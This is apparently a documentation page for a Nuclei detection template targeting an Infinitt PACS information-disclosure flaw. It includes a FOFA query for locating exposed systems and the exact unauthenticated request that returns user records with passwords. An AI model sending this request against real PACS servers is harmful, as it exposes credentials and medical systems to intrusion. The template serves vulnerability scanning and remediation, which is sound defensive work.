Infinitt PACS System - Information Disclosure
ID: infinitt-pacs-info-disclosure
Severity: high
Author: adeljck
Tags: infinitt,disclosure,exposure
Description
Section titled “Description”Infinitt PACS System is vulnerable to an Information Disclosure vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords.
YAML Source
Section titled “YAML Source”id: infinitt-pacs-info-disclosure
info: name: Infinitt PACS System - Information Disclosure author: adeljck severity: high description: | Infinitt PACS System is vulnerable to an Information Disclosure vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords. remediation: | Ensure that access to the WebUserLogin.asmx endpoint is restricted and requires authentication. Implement proper access controls and input validation to prevent unauthorized access to sensitive user information. metadata: verified: true max-request: 1 fofa-query: icon_hash="1474455751" || icon_hash="702238928" tags: infinitt,disclosure,exposure
http: - method: GET path: - "{{BaseURL}}/webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin"
matchers-condition: and matchers: - type: word part: body words: - "<web_user_login>" - "<USER_KEY>" condition: and
- type: word part: content_type words: - "text/xml"
- type: status status: - 200# digest: 4a0a00473045022015a3139d4f05343a4cb0c2c8ff474ec2d04c6e349cfcb09187cb33ccbba80214022100c6872605558c3ffffc9331ac18d562a4b722ef49ec399eda2cc40770fba0a34b:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml"